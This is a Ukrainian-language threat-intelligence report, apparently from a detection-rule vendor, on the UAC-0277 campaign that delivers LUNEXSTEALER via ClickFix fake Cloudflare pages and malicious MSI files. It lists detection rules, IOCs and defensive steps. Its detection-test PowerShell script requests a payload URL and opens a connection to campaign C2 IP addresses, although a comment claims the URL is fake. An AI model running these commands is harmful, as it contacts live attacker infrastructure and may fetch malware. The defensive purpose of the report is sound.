Атаки UAC-0277 доставляють LUNEXSTEALER через шкідливі MSI та ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисні актори, відстежувані як UAC-0277, компрометують легітимні вебсайти для вживлення шкідливого JavaScript, що заманює користувачів виконувати команди через фальшиву сторінку верифікації Cloudflare. Цей метод ClickFix зрештою доставляє пакети MSI, що містять LUNEXSTEALER або додаткові завантажувачі, які використовують BYOVD для уникнення засобів безпеки. Кампанія також використовує інфраструктуру командного та управління на основі блокчейну на Polygon та Ethereum для динамічного управління ресурсами зловмисників.
Розслідування
CERT-UA ідентифікував більше ніж 100 скомпрометованих вебсайтів і проаналізував три варіанти MSI, пов’язаних із кампанією. Дослідники виявили DLL-сторону завантаження із залученням FnHotkeyUtility.exe та експлуатацію вразливого драйвера AMD PDFWKRNL.sys для обходу захисту Windows Defender. Розслідування також виявило розширення браузера LUNARAXE та компонент NAIVEMESS PowerShell, використані для збору та ексфільтрації даних.
Захист
Адміністраторам слід обмежити доступ до діалогу запуску (Win+R) через групові політики та обмежити привілеї установки MSI для авторизованих користувачів. Увімкнення списку блокування вразливих драйверів Microsoft є важливим для зниження ризику атак BYOVD. Організації також повинні впровадити дозволені списки розширень браузера та моніторити підозрілу активність командного рядка msiexec.exe, пов’язану з віддаленими URL.
Відповідь
Коли виявляється підозріла виконання MSI або несанкціоновані розширення браузера, ізолюйте уражений хост і заверште процеси, пов’язані з LUNEXSTEALER. Перевірте заплановані завдання на наявність записів, названих psychedelicloveUtils, і перевірте профілі браузера на наявність розширення Microsoft Office Word Editor. Будь-які виявлені фальшиві сторінки верифікації Cloudflare, пов’язані з кампанією, слід повідомляти до CERT-UA.
Потік атаки
Виявлення
Підозрілі записи RunMRU з семантикою LOLBin (через registry_event)
Можлива спроба віддаленої установки файлу MSI (через cmdline)
Підозріле заплановане завдання (через audit)
Підозріле завантаження файлу через прямий IP (через proxy)
Підозріле командування та контроль через незвичайний запит DNS верхнього рівня (TLD) (через dns)
IOC (HashSha256) для виявлення: Кампанія UAC-0277: Шкідлива розповсюдження MSI через техніку ClickFix та шкідливе програмне забезпечення LUNEXSTEALER Частина 2
IOC (HashSha256) для виявлення: Кампанія UAC-0277: Шкідлива розповсюдження MSI через техніку ClickFix та шкідливе програмне забезпечення LUNEXSTEALER Частина 1
IOC (HashMd5) для виявлення: Кампанія UAC-0277: Шкідлива розповсюдження MSI через техніку ClickFix та шкідливе програмне забезпечення LUNEXSTEALER Частина 2
IOC (HashMd5) для виявлення: Кампанія UAC-0277: Шкідлива розповсюдження MSI через техніку ClickFix та шкідливе програмне забезпечення LUNEXSTEALER Частина 1
IOC (SourceIP) для виявлення: Кампанія UAC-0277: Шкідлива розповсюдження MSI через техніку ClickFix та шкідливе програмне забезпечення LUNEXSTEALER
IOC (DestinationIP) для виявлення: Кампанія UAC-0277: Шкідлива розповсюдження MSI через техніку ClickFix та шкідливе програмне забезпечення LUNEXSTEALER
Виявлення Взаємодії зі Шкідливими C2 Серверами Використовуючи HTTP та WebSocket [Мережева Підключення Windows]
FnHotkeyUtility Виконує Шкідливий spkvol.dll через DLL Стороннє Завантаження [Windows Sysmon]
Завантаження Шкідливого Пакету MSI використовуючи Msiexec та Експлуатацію Вразливостей [Створення Процесу Windows]
Виявлення Шкідливого JavaScript на Скомпрометованих Вебсайтах [Вебсервер]
Виконання Симуляції
-
Наратив Атаки та Команди: Супротивник успішно виконав компрометацію при натисканні. Для встановлення персистенції та завантаження шкідливого програмного забезпечення наступної стадії, імплантований агент намагається отримати файл під назвою
psychedeliclove.exeз конкретного URI. Одночасно агент намагається зв’язатися з вторинним вузлом C2, розташованим на193.178.159.128на порті8080для отримання інструкцій через WebSocket-подібне HTTP з’єднання. Ці специфічні індикатори призначені для того, щоб запускати існуючі правила виявлення на основі проксі. -
Скрипт Регресійного Тестування:
# Скрипт Симуляції для Валідації Виявлення # Мета: Вивести специфічні URL та IP/Port індикатори в правилі виявлення. Write-Host "[*] Початок Симуляції..." -ForegroundColor Cyan # 1. Вибір Тригеру 1: Шаблон Підозрілого URL Write-Host "[*] Спроба доступу до шаблону підозрілого URL..." -ForegroundColor Yellow try { # Ми використовуємо неіснуючий локальний прослуховувач або фальшивий URL, щоб дійсно не звертатися до реального шкідливого сайту, # але проксі все одно повинен зафіксувати спробу запиту. Invoke-WebRequest -Uri "http://107.175.82.242:9000/wilow/psychedeliclove.exe" -ErrorAction SilentlyContinue } catch { Write-Host "[!] Запит не вдався (очікувано), але телеметрія повинна бути згенерована." -ForegroundColor Gray } # 2. Вибір Тригеру 2: Специфічний IP та Порт Write-Host "[*] Спроба підключення до C2 IP на порту 8080..." -ForegroundColor Yellow try { $client = New-Object System.Net.Sockets.TcpClient $client.Connect("193.178.159.128", 8080) $client.Close() } catch { Write-Host "[!] Підключення не вдалось (очікувано), але журнали проксі повинні зафіксувати спробу." -ForegroundColor Gray } Write-Host "[*] Симуляція завершена." -ForegroundColor Cyan -
Команди Очищення:
# Постійні файли не створюються цією симуляцією. # Тільки тимчасові мережеві з'єднання намагаються створити. Write-Host "[*] Очищення завершено. Артефактів на системі не залишилося." -ForegroundColor Green